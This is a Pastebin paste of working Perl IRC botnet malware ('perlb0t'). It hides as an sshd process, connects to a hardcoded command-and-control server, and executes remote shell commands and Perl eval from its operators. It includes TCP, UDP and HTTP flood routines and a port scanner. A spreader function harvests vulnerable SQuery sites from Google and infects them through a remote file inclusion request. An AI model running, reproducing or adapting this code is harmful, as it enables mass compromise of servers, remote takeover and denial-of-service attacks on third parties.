Guest User

Untitled

a guest
May 10th, 2013
367
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 15.89 KB | None | 0 0
  1. #!/usr/bin/perl
  2. # this spreader is coded by xdh
  3. # xdh@xxxxxxxxxxx
  4. # only for testing...
  5.  
  6. my @nickname = ("vn");
  7.  
  8. my $nick = $nickname[rand scalar @nickname];
  9.  
  10. my $ircname = $nickname[rand scalar @nickname];
  11.  
  12.  
  13. #system("kill -9 `ps ax |grep httpdse |grep -v grep|awk '{print $1;}'`");
  14. my $processo = '/usr/sbin/sshd';
  15.  
  16.  
  17. # funny world...
  18.  
  19. my $linas_max='4';
  20. my $sleep='5';
  21. my @adms=("john","vn");
  22. my @hostauth=("localhost");
  23. my @canais=("#nz");
  24. chop (my $realname = 'vn');
  25. $servidor='216.8.179.50' unless $servidor;
  26. my $porta='8080';
  27. my $VERSAO = 'BUCEFALO';
  28. $SIG{'INT'} = 'IGNORE';
  29. $SIG{'HUP'} = 'IGNORE';
  30. $SIG{'TERM'} = 'IGNORE';
  31. $SIG{'CHLD'} = 'IGNORE';
  32. $SIG{'PS'} = 'IGNORE';
  33. use IO::Socket;
  34. use Socket;
  35. use IO::Select;
  36. chdir("/");
  37. #$servidor="$ARGV[0]" if $ARGV[0];
  38. $0="$processo"."\0"x16;;
  39. my $pid=fork;
  40. exit if $pid;
  41. die "Problema com o fork: $!" unless defined($pid);
  42.  
  43. our %irc_servers;
  44. our %DCC;
  45. my $dcc_sel = new IO::Select->new();
  46.  
  47. $sel_cliente = IO::Select->new();
  48. sub sendraw {
  49. if ($#_ == '1') {
  50. my $socket = $_[0];
  51. print $socket "$_[1]\n";
  52. } else {
  53. print $IRC_cur_socket "$_[0]\n";
  54. }
  55. }
  56.  
  57. sub conectar {
  58. my $meunick = $_[0];
  59. my $servidor_con = $_[1];
  60. my $porta_con = $_[2];
  61.  
  62. my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
  63. if (defined($IRC_socket)) {
  64. $IRC_cur_socket = $IRC_socket;
  65.  
  66. $IRC_socket->autoflush(1);
  67. $sel_cliente->add($IRC_socket);
  68.  
  69. $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
  70. $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
  71. $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  72. $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
  73. nick("$meunick");
  74. sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
  75. sendraw("PASS swedenrocks");
  76. sleep 1;
  77. }
  78. }
  79. my $line_temp;
  80. while( 1 ) {
  81. while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
  82. delete($irc_servers{''}) if (defined($irc_servers{''}));
  83. my @ready = $sel_cliente->can_read(0);
  84. next unless(@ready);
  85. foreach $fh (@ready) {
  86. $IRC_cur_socket = $fh;
  87. $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
  88. $nread = sysread($fh, $msg, 4096);
  89. if ($nread == 0) {
  90. $sel_cliente->remove($fh);
  91. $fh->close;
  92. delete($irc_servers{$fh});
  93. }
  94. @lines = split (/\n/, $msg);
  95.  
  96. for(my $c=0; $c<= $#lines; $c++) {
  97. $line = $lines[$c];
  98. $line=$line_temp.$line if ($line_temp);
  99. $line_temp='';
  100. $line =~ s/\r$//;
  101. unless ($c == $#lines) {
  102. parse("$line");
  103. } else {
  104. if ($#lines == 0) {
  105. parse("$line");
  106. } elsif ($lines[$c] =~ /\r$/) {
  107. parse("$line");
  108. } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
  109. parse("$line");
  110. } else {
  111. $line_temp = $line;
  112. }
  113. }
  114. }
  115. }
  116. }
  117.  
  118. sub parse {
  119. my $servarg = shift;
  120. if ($servarg =~ /^PING \:(.*)/) {
  121. sendraw("PONG :$1");
  122. } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
  123. my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
  124. if ($args =~ /^\001VERSION\001$/) {
  125. notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
  126. }
  127. if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
  128. if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
  129. if ($onde eq "$meunick"){
  130. shell("$pn", "$args");
  131. }
  132. if ($args =~ /^(\Q$meunick\E|\.say)\s+(.*)/ ) {
  133. my $natrix = $1;
  134. my $arg = $2;
  135. if ($arg =~ /^\!(.*)/) {
  136. ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
  137. } elsif ($arg =~ /^\@(.*)/) {
  138. $ondep = $onde;
  139. $ondep = $pn if $onde eq $meunick;
  140. bfunc("$ondep","$1");
  141. } else {
  142. shell("$onde", "$arg");
  143. }
  144. }
  145. }
  146. }
  147. } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
  148. if (lc($1) eq lc($meunick)) {
  149. $meunick=$4;
  150. $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  151. }
  152. } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
  153. nick("$meunick".int rand(999));
  154. } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
  155. $meunick = $2;
  156. $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  157. $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
  158. foreach my $canal (@canais) {
  159. sendraw("JOIN $canal ddosit");
  160. }
  161. }
  162. }
  163.  
  164.  
  165. sub bfunc {
  166. my $printl = $_[0];
  167. my $funcarg = $_[1];
  168. if (my $pid = fork) {
  169. waitpid($pid, 0);
  170. } else {
  171. if (fork) {
  172. exit;
  173. } else {
  174. if ($funcarg =~ /^portscan (.*)/) {
  175. my $hostip="$1";
  176. my
  177. @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
  178. my (@aberta, %porta_banner);
  179. sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");
  180. foreach my $porta (@portas) {
  181. my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout
  182. => 4);
  183. if ($scansock) {
  184. push (@aberta, $porta);
  185. $scansock->close;
  186. }
  187. }
  188.  
  189. if (@aberta) {
  190. sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
  191. } else {
  192. sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found");
  193. }
  194. }
  195. if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
  196. sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
  197. my $itime = time;
  198. my ($cur_time);
  199. $cur_time = time - $itime;
  200. while ($3>$cur_time){
  201. $cur_time = time - $itime;
  202. &tcpflooder("$1","$2","$3");
  203. }
  204. sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2.".");
  205. }
  206. if ($funcarg =~ /^version/) {
  207. sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 perlb0t ver ".$VERSAO);
  208. }
  209. if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
  210. sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for unpatched INDEXU for ".$1."
  211. seconds.");
  212. srand;
  213. my $itime = time;
  214. my ($cur_time);
  215. my ($exploited);
  216. $boturl=$2;
  217. $cur_time = time - $itime;$exploited = 0;
  218. while($1>$cur_time){
  219. $cur_time = time - $itime;
  220. @urls=fetch();
  221. foreach $url (@urls) {
  222. $cur_time = time - $itime;
  223. my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
  224. $url =$path."/SQuery/lib/gore.php?libpath=$boturl?";
  225. $page = http_query($url);
  226. $exploited = $exploited + 1;
  227. }
  228. }
  229. sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1."
  230. seconds.");
  231. }
  232. if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
  233. sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds.");
  234. my $itime = time;
  235. my ($cur_time);
  236. $cur_time = time - $itime;
  237. while ($2>$cur_time){
  238. $cur_time = time - $itime;
  239. my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
  240. print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
  241. close($socket);
  242. }
  243. sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
  244. }
  245. if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
  246. sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for
  247. ".$3." seconds.");
  248. my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
  249. $dtime = 1 if $dtime == 0;
  250. my %bytes;
  251. $bytes{igmp} = $2 * $pacotes{igmp};
  252. $bytes{icmp} = $2 * $pacotes{icmp};
  253. $bytes{o} = $2 * $pacotes{o};
  254. $bytes{udp} = $2 * $pacotes{udp};
  255. $bytes{tcp} = $2 * $pacotes{tcp};
  256. sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent
  257. ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
  258. }
  259. exit;
  260. }
  261. }
  262. }
  263.  
  264. sub ircase {
  265. my ($kem, $printl, $case) = @_;
  266.  
  267. if ($case =~ /^join (.*)/) {
  268. j("$1");
  269. }
  270. if ($case =~ /^part (.*)/) {
  271. p("$1");
  272. }
  273. if ($case =~ /^rejoin\s+(.*)/) {
  274. my $chan = $1;
  275. if ($chan =~ /^(\d+) (.*)/) {
  276. for (my $ca = 1; $ca <= $1; $ca++ ) {
  277. p("$2");
  278. j("$2");
  279. }
  280. } else {
  281. p("$chan");
  282. j("$chan");
  283. }
  284. }
  285. if ($case =~ /^op/) {
  286. op("$printl", "$kem") if $case eq "op";
  287. my $oarg = substr($case, 3);
  288. op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
  289. }
  290. if ($case =~ /^deop/) {
  291. deop("$printl", "$kem") if $case eq "deop";
  292. my $oarg = substr($case, 5);
  293. deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
  294. }
  295. if ($case =~ /^msg\s+(\S+) (.*)/) {
  296. msg("$1", "$2");
  297. }
  298. if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
  299. for (my $cf = 1; $cf <= $1; $cf++) {
  300. msg("$2", "$3");
  301. }
  302. }
  303. if ($case =~ /^ctcp\s+(\S+) (.*)/) {
  304. ctcp("$1", "$2");
  305. }
  306. if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
  307. for (my $cf = 1; $cf <= $1; $cf++) {
  308. ctcp("$2", "$3");
  309. }
  310. }
  311. if ($case =~ /^nick (.*)/) {
  312. nick("$1");
  313. }
  314. if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
  315. conectar("$2", "$1", 6667);
  316. }
  317. if ($case =~ /^raw (.*)/) {
  318. sendraw("$1");
  319. }
  320. if ($case =~ /^eval (.*)/) {
  321. eval "$1";
  322. }
  323. }
  324.  
  325. sub shell {
  326. my $printl=$_[0];
  327. my $comando=$_[1];
  328. if ($comando =~ /cd (.*)/) {
  329. chdir("$1") || msg("$printl", "No such file or directory");
  330. return;
  331. }
  332. elsif ($pid = fork) {
  333. waitpid($pid, 0);
  334. } else {
  335. if (fork) {
  336. exit;
  337. } else {
  338. my @resp=`$comando 2>&1 3>&1`;
  339. my $c=0;
  340. foreach my $linha (@resp) {
  341. $c++;
  342. chop $linha;
  343. sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
  344. if ($c == "$linas_max") {
  345. $c=0;
  346. sleep $sleep;
  347. }
  348. }
  349. exit;
  350. }
  351. }
  352. }
  353.  
  354. sub tcpflooder {
  355. my $itime = time;
  356. my ($cur_time);
  357. my ($ia,$pa,$proto,$j,$l,$t);
  358. $ia=inet_aton($_[0]);
  359. $pa=sockaddr_in($_[1],$ia);
  360. $ftime=$_[2];
  361. $proto=getprotobyname('tcp');
  362. $j=0;$l=0;
  363. $cur_time = time - $itime;
  364. while ($l<1000){
  365. $cur_time = time - $itime;
  366. last if $cur_time >= $ftime;
  367. $t="SOCK$l";
  368. socket($t,PF_INET,SOCK_STREAM,$proto);
  369. connect($t,$pa)||$j--;
  370. $j++;$l++;
  371. }
  372. $l=0;
  373. while ($l<1000){
  374. $cur_time = time - $itime;
  375. last if $cur_time >= $ftime;
  376. $t="SOCK$l";
  377. shutdown($t,2);
  378. $l++;
  379. }
  380. }
  381.  
  382. sub udpflooder {
  383. my $iaddr = inet_aton($_[0]);
  384. my $msg = 'A' x $_[1];
  385. my $ftime = $_[2];
  386. my $cp = 0;
  387. my (%pacotes);
  388. $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
  389.  
  390. socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
  391. socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
  392. socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
  393. socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
  394. return(undef) if $cp == 4;
  395. my $itime = time;
  396. my ($cur_time);
  397. while ( 1 ) {
  398. for (my $porta = 1; $porta <= 65000; $porta++) {
  399. $cur_time = time - $itime;
  400. last if $cur_time >= $ftime;
  401. send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
  402. send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
  403. send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
  404. send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
  405.  
  406. for (my $pc = 3; $pc <= 255;$pc++) {
  407. next if $pc == 6;
  408. $cur_time = time - $itime;
  409. last if $cur_time >= $ftime;
  410. socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
  411. send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
  412. }
  413. }
  414. last if $cur_time >= $ftime;
  415. }
  416. return($cur_time, %pacotes);
  417. }
  418.  
  419. sub ctcp {
  420. return unless $#_ == 1;
  421. sendraw("PRIVMSG $_[0] :\001$_[1]\001");
  422. }
  423. sub msg {
  424. return unless $#_ == 1;
  425. sendraw("PRIVMSG $_[0] :$_[1]");
  426. }
  427. sub notice {
  428. return unless $#_ == 1;
  429. sendraw("NOTICE $_[0] :$_[1]");
  430. }
  431. sub op {
  432. return unless $#_ == 1;
  433. sendraw("MODE $_[0] +o $_[1]");
  434. }
  435. sub deop {
  436. return unless $#_ == 1;
  437. sendraw("MODE $_[0] -o $_[1]");
  438. }
  439. sub j { &join(@_); }
  440. sub join {
  441. return unless $#_ == 0;
  442. sendraw("JOIN $_[0]");
  443. }
  444. sub p { part(@_); }
  445. sub part {
  446. sendraw("PART $_[0]");
  447. }
  448. sub nick {
  449. return unless $#_ == 0;
  450. sendraw("NICK $_[0]");
  451. }
  452. sub quit {
  453. sendraw("QUIT :$_[0]");
  454. }
  455.  
  456. # Spreader
  457. # this 'spreader' code isnot mine, i dont know who coded it.
  458. # update: well, i just fix0red this shit a bit.
  459. #
  460.  
  461. sub fetch(){
  462. my $rnd=(int(rand(9999)));
  463. my $n= 80;
  464. if ($rnd<5000) { $n<<=1;}
  465. my $s= (int(rand(10)) * $n);
  466.  
  467. my @dominios = ("com","net","org","info","gov", "gob","gub","xxx",
  468. "eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec",
  469.  
  470. "py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop",
  471.  
  472. "af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi",
  473. "vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
  474.  
  475. "ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir",
  476.  
  477. "iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke",
  478.  
  479. "ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm",
  480.  
  481. "na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc",
  482.  
  483. "sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz",
  484. "vu","vn","ye","yu","cd","zm","zw","");
  485. my @str;
  486.  
  487. foreach $dom (@dominios)
  488. {
  489. push (@str,"%22inurl%3Amodules.php%3Fname%3DSQuery%22+site%3A".$dom."%20");
  490. }
  491.  
  492. my $query="www.google.com/search?q=";
  493. $query.=$str[(rand(scalar(@str)))];
  494. $query.="&num=$n&start=$s";
  495. my @lst=();
  496. my $page = http_query($query);
  497. while ($page =~ m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
  498. if ($1 !~ m/google|cache|translate/){
  499. push (@lst,$1);
  500. }
  501. }
  502. return (@lst);
  503. }
  504.  
  505. sub http_query($){
  506. my ($url) = @_;
  507. my $host=$url;
  508. my $query=$url;
  509. my $page="";
  510. $host =~ s/href=\"?http:\/\///;
  511. $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  512. $query =~s/$host//;
  513. if ($query eq "") {$query="/";};
  514. eval {
  515. local $SIG{ALRM} = sub { die "1";};
  516. alarm 10;
  517. my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
  518. print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
  519. my @r = <$sock>;
  520. $page="@r";
  521. alarm 0;
  522. close($sock);
  523. };
  524. return $page;
  525.  
  526. }
Advertisement
Add Comment
Please, Sign In to add comment